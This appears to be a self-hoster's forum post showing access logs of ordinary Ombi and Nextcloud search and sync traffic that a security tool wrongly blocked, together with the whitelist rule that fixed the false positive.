xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/207784 HTTP/1.1" 200 17387 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/458171 HTTP/1.1" 200 24607 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/282804 HTTP/1.1" 200 16735 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464274 HTTP/1.1" 200 17450 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9627 HTTP/1.1" 200 27384 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/19199 HTTP/1.1" 200 24705 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/207234 HTTP/1.1" 200 21472 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/210370 HTTP/1.1" 200 24290 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/302551 HTTP/1.1" 200 18473 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/114428 HTTP/1.1" 200 21482 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/5609 HTTP/1.1" 200 21907 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/325439 HTTP/1.1" 200 24196 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/121523 HTTP/1.1" 200 19659 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/173330 HTTP/1.1" 200 20875 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/434448 HTTP/1.1" 200 20410 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/1040 HTTP/1.1" 200 45393 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/3686 HTTP/1.1" 200 34423 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9347 HTTP/1.1" 200 23596 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/113332 HTTP/1.1" 200 38544 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/5608 HTTP/1.1" 200 22325 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/169818 HTTP/1.1" 200 25061 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/291345 HTTP/1.1" 200 3767 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/399377 HTTP/1.1" 200 29960 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/449345 HTTP/1.1" 200 19430 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/661818 HTTP/1.1" 200 19007 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/383934 HTTP/1.1" 200 18529 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/796975 HTTP/1.1" 200 18617 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464260 HTTP/1.1" 200 21611 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/399377 HTTP/1.1" 200 29960 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/29005 HTTP/1.1" 200 36478 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/19597 HTTP/1.1" 200 5371 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/400574 HTTP/1.1" 200 41162 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/21220 HTTP/1.1" 200 76695 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/75686 HTTP/1.1" 200 4360 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/10918 HTTP/1.1" 200 60954 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/41571 HTTP/1.1" 200 27939 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/89293 HTTP/1.1" 200 20731 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/63307 HTTP/1.1" 200 17672 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/95226 HTTP/1.1" 200 76706 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/105875 HTTP/1.1" 200 23833 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/111115 HTTP/1.1" 200 72639 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/66324 HTTP/1.1" 200 62873 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/117883 HTTP/1.1" 200 9245 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/66312 HTTP/1.1" 200 46578 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /images/default_movie_poster.png HTTP/1.1" 404 575 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/64190 HTTP/1.1" 200 1214797 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"

The following whitelist rule fixed this:
- "evt.Parsed.request contains '/ombi/api/v2/search'"

Here is me getting blocked while using Nextcloud:

xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings_apps/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/comments/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/cookbook/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1563 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/files/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 2030 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/circles/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1563 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck-comment/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 997 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-conversations/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/contacts/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/calendar/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/tasks/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/jitsi/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/notes/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/poll/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message-current/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/apps/theming/img/core/filetypes/x-office-document.svg?v=0 HTTP/1.1" 200 1299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4441 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/SyncPC/Documents HTTP/1.1" 207 6320 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/SyncPC/Pictures HTTP/1.1" 207 1178 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/.Notes HTTP/1.1" 207 1169 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=254153 HTTP/1.1" 200 1387 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=250723 HTTP/1.1" 200 5103 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/cookbook/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/Stamm HTTP/1.1" 207 1171 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings_apps/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=249763 HTTP/1.1" 200 2097 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/Ma+Ri HTTP/1.1" 207 1173 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/circles/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 999 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/comments/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/LB.systems HTTP/1.1" 207 1173 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/files/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1537 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 999 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck-comment/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 997 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-conversations/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/contacts/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 998 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/calendar/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 998 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/tasks/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/notes/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/jitsi/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/poll/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message-current/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
